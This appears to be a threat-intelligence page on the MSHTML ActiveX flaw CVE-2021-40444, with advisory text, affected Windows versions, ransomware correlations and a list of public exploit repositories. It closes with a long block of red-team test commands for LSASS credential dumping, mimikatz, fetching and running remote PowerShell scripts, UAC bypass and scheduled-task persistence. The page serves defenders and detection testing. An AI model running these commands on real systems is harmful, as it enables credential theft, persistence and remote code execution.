CVE-2021-40444
Overview
This vulnerability is a remote code execution flaw originating from improper handling of ActiveX controls within the MSHTML component used by Microsoft Office documents that host the browser rendering engine. The root cause lies in the ability to craft malicious ActiveX controls that are executed when a specially-crafted Office document is opened, triggering unsafe script execution within the MSHTML engine. The vulnerability affects multiple Windows 10 versions through their embedded MSHTML browser rendering component.
Vulnerability Description
<p>Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.</p> <p>An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.</p> <p>Microsoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: “Suspicious Cpl File Execution”.</p> <p>Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.</p> <p>Please see the <strong>Mitigations</strong> and <strong>Workaround</strong> sections for important information about steps you can take to protect your system from this vulnerability.</p> <p><strong>UPDATE</strong> September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.</p>
Impact
An attacker who successfully exploits this vulnerability can execute arbitrary code remotely on the target system with the privileges of the user opening the malicious document. This requires user interaction to open the crafted Office file. Users with administrative privileges are at higher risk of full system compromise, while limited accounts may experience reduced impact. The vulnerability enables attackers to perform actions such as installing programs, viewing or modifying data, and creating new accounts, potentially leading to data breaches or system takeover within enterprise environments.
Solution
Microsoft has released security updates addressing this vulnerability in their September 14, 2021 security release. Affected products include Microsoft Windows 10 versions 1507 through 2004. Enterprise customers should deploy Microsoft Defender detection build 1.349.22.0 or newer to detect exploit attempts. Detailed patch and update instructions are available at the Microsoft Security Response Center advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444. Customers using automatic updates are advised to ensure updates are applied promptly.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
EXOTIC LILY
|
MEDIUM | — | correlation_misp |
|
EXOTIC LILY
|
MEDIUM | — | correlation_mitre |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A significant remote code execution vulnerability exists within the MSHTML component of Microsoft Windows, which is particularly concerning due to its potential for exploitation through specially crafted Microsoft Office documents. This vulnerability arises from the improper handling of ActiveX controls, allowing an attacker to embed malicious code within a document that utilizes the browser rendering engine. When a user opens such a document, the malicious code can execute, potentially leading to unauthorized access and control over the user's system. The severity of this vulnerability is underscored by its high CVSS score of 8.8, indicating a critical risk that organizations must address promptly.
The primary attack vector involves social engineering, where an attacker must convince a user to open a malicious Office document. This could occur through phishing emails or other deceptive means. Once the document is opened, the embedded ActiveX control can execute arbitrary code, which may allow the attacker to install malware, exfiltrate sensitive data, or gain persistent access to the system. Users operating with administrative privileges are at a heightened risk, as the impact of the attack can be more severe, potentially compromising the entire system rather than being limited to the user's session. Targeted attacks have already been reported, emphasizing the urgency for organizations to implement protective measures.
The real-world implications of this vulnerability are profound, particularly for businesses that rely on Microsoft Windows and Office products. Successful exploitation can lead to significant data breaches, financial losses, and reputational damage. Organizations may face regulatory penalties if sensitive data is compromised, especially in industries subject to strict data protection regulations. Furthermore, the potential for widespread exploitation means that even organizations with robust security measures could find themselves at risk if they do not address this vulnerability promptly.
To mitigate the risks associated with this vulnerability, organizations should prioritize the implementation of security updates released by Microsoft. Keeping antimalware products up to date is crucial, as both Microsoft Defender Antivirus and Microsoft Defender for Endpoint provide detection and protection against known exploits. For enterprise environments, it is essential to manage updates effectively, ensuring that the latest detection builds are deployed across all systems. Additionally, user education is vital; training employees to recognize phishing attempts and the dangers of opening unsolicited documents can significantly reduce the likelihood of successful exploitation.
In conclusion, the remote code execution vulnerability within the MSHTML component poses a serious threat to Microsoft Windows users, particularly those using Microsoft Office. The combination of social engineering tactics and the potential for severe consequences necessitates immediate action from organizations to secure their systems. By implementing timely updates, enhancing detection capabilities, and fostering a culture of cybersecurity awareness, businesses can significantly reduce their exposure to this and similar vulnerabilities, safeguarding their operations and sensitive data from malicious actors.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2021-40444, with new exploit attempts emerging in the wild. This uptick coincides with the appearance of multiple publicly available proof-of-concept exploits, which have been disseminated across various platforms, increasing the accessibility of attack tools to a broader range of threat actors. Notably, ransomware groups such as EXOTIC LILY continue to be associated with campaigns leveraging this vulnerability, underscoring its ongoing operational relevance in ransomware deployment. Although the EPSS score remains high and stable, the increased telemetry signals a heightened exploitation risk that defenders must acknowledge. This development elevates the threat posture, indicating that adversaries are actively weaponizing CVE-2021-40444 beyond initial targeted attacks, thereby expanding the potential impact on vulnerable Microsoft Windows environments.
Update 2 — June 23, 2026
CSURFACE threat intelligence has detected a marked escalation in activity exploiting CVE-2021-40444, reflected in a significant uptick in telemetry signals and a rising EPSS score. This surge indicates that threat actors are increasingly leveraging weaponized Microsoft Office documents embedded with malicious ActiveX controls to target vulnerable Windows 10 Version 1809 systems. The proliferation of publicly available proof-of-concept exploits and tooling further lowers the barrier for adversaries, facilitating broader exploitation beyond initial targeted campaigns. Notably, ransomware groups such as EXOTIC LILY remain actively associated with operations exploiting this vulnerability, underscoring its persistent utility in ransomware deployment chains. This evolving exploitation landscape elevates the threat level, signaling a transition from isolated incidents to more widespread and opportunistic attacks. Defenders should interpret this as an increased operational risk, as adversaries are intensifying efforts to weaponize this vulnerability, potentially expanding the scope and impact of compromise within affected environments.
Affected Products (19)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Windows 10 1507 | All |
cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 1607 | All |
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 1809 | All |
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 1909 | All |
cpe:2.3:o:microsoft:windows_10_1909:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 2004 | All |
cpe:2.3:o:microsoft:windows_10_2004:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 20h2 | All |
cpe:2.3:o:microsoft:windows_10_20h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 21h1 | All |
cpe:2.3:o:microsoft:windows_10_21h1:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 7 | N/A |
cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*
|
|
|
Microsoft | Windows 8.1 | N/A |
cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Rt 8.1 | N/A |
cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2004 | All |
cpe:2.3:o:microsoft:windows_server_2004:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2008 | N/A |
cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2008 | r2 |
cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*
|
|
|
Microsoft | Windows Server 2012 | N/A |
cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2012 | N/A |
cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2016 | All |
cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2019 | All |
cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2022 | All |
cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 20h2 | All |
cpe:2.3:o:microsoft:windows_server_20h2:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Microsoft Office Word Malicious MSHTML RCE
exploits/windows/fileformat/word_mshtml_rce
|
lockedbyte, klezVirus, thesunRider +1 | Unknown | - | View |
GitHub PoCs (36)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
lockedbyte/CVE-2021-40444
CVE-2021-40444 PoC
|
lockedbyte | 1756 | 476 | 2021-09-10 | View |
|
klezVirus/CVE-2021-40444
CVE-2021-40444 - Fully Weaponized Microsoft Office Word RCE Exploit
|
klezVirus | 826 | 164 | 2021-09-15 | View |
|
aslitsecurity/CVE-2021-40444_builders
This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit
|
aslitsecurity | 169 | 39 | 2021-09-12 | View |
|
Edubr2020/CVE-2021-40444--CABless
Modified code so that we don´t need to rely on CAB archives
|
Edubr2020 | 102 | 19 | 2021-09-19 | View |
|
34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit
CVE-2021-40444
|
34zY | 65 | 22 | 2021-12-19 | View |
|
k4k4/CVE-2021-40444-Sample
CVE-2021-40444 Sample
|
k4k4 | 1 | 48 | 2021-09-10 | View |
|
rfcxv/CVE-2021-40444-POC
|
rfcxv | 16 | 14 | 2021-09-09 | View |
|
k8gege/CVE-2021-40444
|
k8gege | 19 | 6 | 2021-09-14 | View |
|
ozergoker/CVE-2021-40444
Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444
|
ozergoker | 16 | 7 | 2021-09-08 | View |
|
DarkSprings/CVE-2021-40444
CVE-2021-40444 POC
|
DarkSprings | 7 | 9 | 2021-09-09 | View |
|
mansk1es/Caboom
A malicious .cab creation tool for CVE-2021-40444
|
mansk1es | 11 | 3 | 2021-09-11 | View |
|
H0j3n/CVE-2021-40444
|
H0j3n | 9 | 4 | 2021-10-03 | View |
|
kagura-maru/CVE-2021-40444-POC
An attempt to reproduce Microsoft MSHTML Remote Code Execution (RCE) Vulnerability and using Metasploit Framework.
|
kagura-maru | 9 | 1 | 2021-10-28 | View |
|
LazarusReborn/Docx-Exploit-2021
This docx exploit uses res files inside Microsoft .docx file to execute malicious files. This exploit is related to CVE-...
|
LazarusReborn | 5 | 3 | 2021-09-29 | View |
|
fengjixuchui/CVE-2021-40444-docx-Generate
|
fengjixuchui | 4 | 3 | 2021-09-11 | View |
|
bambooqj/CVE-2021-40444_EXP_JS
根据已知样本反编译代码
|
bambooqj | 2 | 3 | 2021-09-09 | View |
|
Phuong39/CVE-2021-40444-CAB
CVE-2021-40444 - Custom CAB templates from MakeCAB
|
Phuong39 | 0 | 5 | 2021-09-16 | View |
|
vysecurity/CVE-2021-40444
|
vysecurity | 3 | 0 | 2021-09-09 | View |
|
MRacumen/CVE-2021-40444
Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit
|
MRacumen | 2 | 1 | 2021-12-28 | View |
|
Zeop-CyberSec/word_mshtml
Contains the offensive (exploit and auxiliary) modules for the CVE-2021-40444.
|
Zeop-CyberSec | 1 | 1 | 2021-11-08 | View |
|
hqdat809/CVE-2021-40444
|
hqdat809 | 0 | 1 | 2023-06-05 | View |
|
khoaduynu/CVE-2021-40444
POC for CVE-2021-40444
|
khoaduynu | 1 | 0 | 2021-09-13 | View |
|
Immersive-Labs-Sec/cve-2021-40444-analysis
|
Immersive-Labs-Sec | 0 | 1 | 2021-09-09 | View |
|
W1kyri3/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx
|
W1kyri3 | 0 | 1 | 2021-09-12 | View |
|
lisinan988/CVE-2021-40444-exp
|
lisinan988 | 0 | 0 | 2021-11-25 | View |
|
tiagob0b/CVE-2021-40444
|
tiagob0b | 0 | 0 | 2021-10-24 | View |
|
nvchungkma/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-
|
nvchungkma | 0 | 0 | 2022-08-24 | View |
|
basim-ahmad/Follina-CVE-and-CVE-2021-40444
This repository contains scripts and resources for exploiting the Follina CVE and CVE-2021-40444 vulnerabilities in Micr...
|
basim-ahmad | 0 | 0 | 2024-07-28 | View |
|
RedLeavesChilde/CVE-2021-40444
|
RedLeavesChilde | 0 | 0 | 2022-04-28 | View |
|
KnoooW/CVE-2021-40444-docx-Generate
|
KnoooW | 0 | 0 | 2021-09-11 | View |
|
jamesrep/cve-2021-40444
Reverse engineering the "A Letter Before Court 4.docx" malicious files exploting cve-2021-40444
|
jamesrep | 0 | 0 | 2021-09-12 | View |
|
Jeromeyoung/MSHTMHell
Malicious document builder for CVE-2021-40444
|
Jeromeyoung | 0 | 0 | 2021-09-14 | View |
|
kal1gh0st/CVE-2021-40444_CAB_archives
CVE 2021 40444 Windows Exploit services.dll
|
kal1gh0st | 0 | 0 | 2021-09-24 | View |
|
metehangenel/MSHTML-CVE-2021-40444
|
metehangenel | 0 | 0 | 2021-10-15 | View |
|
Jeromeyoung/TIC4301_Project
TIC4301 Project - CVE-2021-40444
|
Jeromeyoung | 0 | 0 | 2021-10-16 | View |
|
Alexcot25051999/CVE-2021-40444
|
Alexcot25051999 | 0 | 0 | 2021-11-22 | View |
Ransomware Groups 2
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
